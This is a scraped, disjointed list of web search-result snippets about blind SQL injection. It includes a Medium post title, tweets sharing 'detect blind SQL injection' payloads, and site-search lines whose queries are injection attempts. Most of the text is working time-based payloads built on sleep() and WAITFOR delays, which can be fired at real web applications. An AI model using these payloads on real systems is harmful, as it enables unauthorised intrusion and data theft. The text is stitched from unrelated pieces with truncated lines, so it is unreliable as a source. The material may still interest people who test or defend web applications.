How I Found Sql Injection on 8x8 , Cengage,Comodo,Automattic,20 company | by Ahmad A Abdulla | Medium
Search results for: '0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z" AND 2*3*8=6*8 AND "YjTu"="YjTu'
Jawad ar Twitter: "Detect Blind SQL INJECTION with these payloads 0"XOR (if(now()=sysdate(),sleep(12),0))XOR"Z%20=%3E 0'XOR(if(now()=sysdate(),sleep (3),0))XOR'Z '%20WAITFOR
Search results for: '0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z" AND 2*3*8=6*8 AND "Z0cm"="Z0cm'
NS 🍥 on Twitter: "Blind #SQLInjection on #GraphQL The API accepts queries for user "gender" data and accepts 3 keywords "M,F,NA", I found the parader "xxxkeyword_xx_xx" is vulnerable to blind-SQL injection attacks